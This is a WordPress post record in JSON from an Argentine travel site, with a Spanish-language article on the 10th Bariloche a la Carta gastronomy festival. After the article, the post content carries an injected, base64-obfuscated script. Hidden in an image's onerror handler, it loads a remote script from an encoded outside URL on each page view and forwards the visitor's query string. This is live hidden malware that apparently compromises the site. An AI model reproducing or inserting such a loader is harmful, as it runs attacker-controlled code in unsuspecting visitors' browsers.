{"id":8831,"date":"2024-10-17T08:10:02","date_gmt":"2024-10-17T11:10:02","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=8831"},"modified":"2025-08-13T15:37:13","modified_gmt":"2025-08-13T18:37:13","slug":"identidad-gastronomica-argentina-en-rio-negro","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=8831","title":{"rendered":"Identidad gastron\u00f3mica argentina en R\u00edo Negro"},"content":{"rendered":"\n<h3 class=\"wp-block-heading\"><em>La 10\u00aa edici\u00f3n de Bariloche a la Carta (BALC) cont\u00f3 con la presencia de grandes figuras de la cocina que desarrollaron su actividad en el interior del pa\u00eds promoviendo una perspectiva federal.<\/em><\/h3>\n\n\n\n<p>Con la colaboraci\u00f3n del programa\u00a0<strong>Gustar<\/strong>, llevado adelante por la\u00a0<strong>Secretar\u00eda de Turismo, Ambiente y Deportes<\/strong>,\u00a0<strong>BALC<\/strong>\u00a0profundiz\u00f3 su compromiso con la gastronom\u00eda identitaria del todo el pa\u00eds.<\/p>\n\n\n\n<p><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/cocineros_balc.jpeg\" alt=\"\" \/><\/figure>\n\n\n\n<p>En esta ocasi\u00f3n concurrieron m\u00e1s de&nbsp;<strong>40 mil personas<\/strong>&nbsp;que disfrutaron del evento en el que participaron m\u00e1s de&nbsp;<strong>80 restaurantes, cervecer\u00edas, bares y caf\u00e9s con men\u00fas a precios promocionales. A dem\u00e1s hubo m\u00e1s de 150 expositores<\/strong>&nbsp;y participaron&nbsp;<strong>500 asistentes<\/strong>&nbsp;a las clases magistrales.<\/p>\n\n\n\n<p>Del\u00a0<strong>10 al 13 de octubre<\/strong>\u00a0se realiz\u00f3 la tradicional\u00a0<strong>Feria Gastron\u00f3mica en el Centro C\u00edvico, con 100 expositores<\/strong>\u00a0que presentaron lo mejor de la producci\u00f3n local y regional, desde frutas y quesos hasta vinos y cervezas artesanales.<\/p>\n<p>\u00a0<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/cocina_balc.jpeg\" alt=\"\" \/><\/figure>\n\n\n\n<p>Se realizaron&nbsp;<strong>14 \u00abPop Ups\u00bb<\/strong>, que son cenas \u00fanicas donde los cocineros intervinieron con productos locales para crear un men\u00fa especial. Con el objetivo de fusionar sabores regionales, se integraron conocimientos de distintos chefs con sus pares locales para degustar diferentes platos t\u00edpicos.<\/p>\n\n\n\n<p>Entre los chefs que participaron se destacan:\u00a0<strong>Gunther Moros, de Misiones<\/strong>, quien gan\u00f3 el prestigioso Prix Baron B Edition Cuisine;\u00a0<strong>Alina Ruiz, de Chaco y Agust\u00edn Kuran, de Santiago del Estero<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><a href=\"https:\/\/www.argentina.gob.ar\/noticias\/identidad-gastronomica-argentina-en-rio-negro\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/profiles\/argentinagobar\/themes\/argentinagobar\/argentinagobar_theme\/logo_argentina-azul.svg\" alt=\"\" style=\"width:400px;height:auto\" \/><\/a><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\"><\/h2>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La 10\u00aa edici\u00f3n de Bariloche a la Carta (BALC) cont\u00f3 con la presencia de grandes figuras de la cocina que desarrollaron su actividad en el interior del pa\u00eds promoviendo una perspectiva federal. Con la colaboraci\u00f3n del programa\u00a0Gustar, llevado adelante por la\u00a0Secretar\u00eda de Turismo, Ambiente y Deportes,\u00a0BALC\u00a0profundiz\u00f3 su compromiso con la gastronom\u00eda identitaria del todo el [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":8832,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[29,21],"tags":[],"class_list":["post-8831","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-datos-utiles","category-patagonia"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/8831","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8831"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/8831\/revisions"}],"predecessor-version":[{"id":10062,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/8831\/revisions\/10062"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/8832"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8831"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8831"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8831"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}